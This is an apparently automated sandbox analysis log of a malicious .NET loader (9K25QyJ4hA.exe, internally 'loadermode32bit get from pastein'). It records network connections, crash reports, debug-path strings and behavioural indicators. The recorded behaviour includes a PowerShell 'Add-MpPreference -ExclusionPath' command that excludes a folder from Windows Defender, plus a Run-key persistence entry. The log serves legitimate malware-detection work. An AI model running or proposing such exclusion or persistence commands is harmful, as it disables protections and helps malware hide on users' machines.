Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.70.240:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 5.253.86.15:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0498B4A02_2_0498B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0498B4902_2_0498B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08A43A982_2_08A43A98
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440
Source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000000.00000000.1216864322.00000000006C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: 9K25QyJ4hA.exeBinary or memory string: OriginalFilenameloadermode32bit get from pastein.exeb! vs 9K25QyJ4hA.exe
Source: classification engineClassification label: mal72.evad.winEXE@15/26@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7964
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7544
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeFile created: C:\Users\user\AppData\Local\Temp\windowscache.binJump to behavior
Source: 9K25QyJ4hA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 9K25QyJ4hA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 9K25QyJ4hA.exeReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeFile read: C:\Users\user\Desktop\9K25QyJ4hA.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\9K25QyJ4hA.exe C:\Users\user\Desktop\9K25QyJ4hA.exe
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 2440
Source: unknownProcess created: C:\Users\user\Desktop\9K25QyJ4hA.exe "C:\Users\user\Desktop\9K25QyJ4hA.exe"
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 2408
Source: unknownProcess created: C:\Users\user\Desktop\9K25QyJ4hA.exe "C:\Users\user\Desktop\9K25QyJ4hA.exe"
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 2416
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\DesktopJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\DesktopJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: 9K25QyJ4hA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 9K25QyJ4hA.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 9K25QyJ4hA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2406232584.00000000067FF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbT source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdbE source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbj source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdba source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbVy source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbDc source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: loadermode32bit get from pastein.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb6 source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000E23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\9K25QyJ4hA.PDB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P:P ,P_CorExeMainmscoree.dll source: 9K25QyJ4hA.exe
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb( source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbGs source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe
Source: Binary string: mscorlib.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbB source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\loadermode32bit get from pastein.pdbC source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\loadermode32bit get from pastein.pdbpdbein.pdb< source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbhh source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbc source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbm source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: %%.pdb)s( source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL} source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\loadermode32bit get from pastein.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbTzIs source: WERB65A.tmp.dmp.23.dr
Source: Binary string: System.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: @wo.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: osymbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbL}ll source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbL0vw# source: WERD675.tmp.dmp.32.dr
Source: Binary string: System.Configuration.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\System.pdb source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdbTzIs source: WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb/ source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb5y source: 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2223704058.0000000002BEB000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2320518214.0000000002889000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2323897269.00000000063C4000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2402347273.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp, WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\loadermode32bit get from pastein.pdb) source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ein.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2239638441.00000000065B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\NEW LIFE\Source\Repos\loadermode32bit get from pastein\loadermode32bit get from pastein\obj\Debug\loadermode32bit get from pastein.pdb P source: 9K25QyJ4hA.exe, 00000000.00000000.1216864322.00000000006C2000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbl source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ?woC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb4 source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbH source: WERD675.tmp.dmp.32.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: 9K25QyJ4hA.exe, 00000000.00000002.2220357541.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2399283485.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.pdb4 source: WER9219.tmp.dmp.7.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp, 9K25QyJ4hA.exe, 00000018.00000002.2398306763.0000000000CF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: oxg|HPko0C:\Windows\mscorlib.pdb source: 9K25QyJ4hA.exe, 00000012.00000002.2317122561.00000000006F9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb7 source: 9K25QyJ4hA.exe, 00000012.00000002.2317189482.000000000073B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbp source: 9K25QyJ4hA.exe, 00000000.00000002.2220017054.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD675.tmp.dmp.32.dr, WERB65A.tmp.dmp.23.dr, WER9219.tmp.dmp.7.dr
Source: 9K25QyJ4hA.exeStatic PE information: 0x95FD26BA [Mon Sep 27 22:48:26 2049 UTC]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0498634D push eax; ret 2_2_04986361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08A47400 push eax; retf 2_2_08A47401
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BlockHost.exeJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BlockHost.exeJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\9K25QyJ4hA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
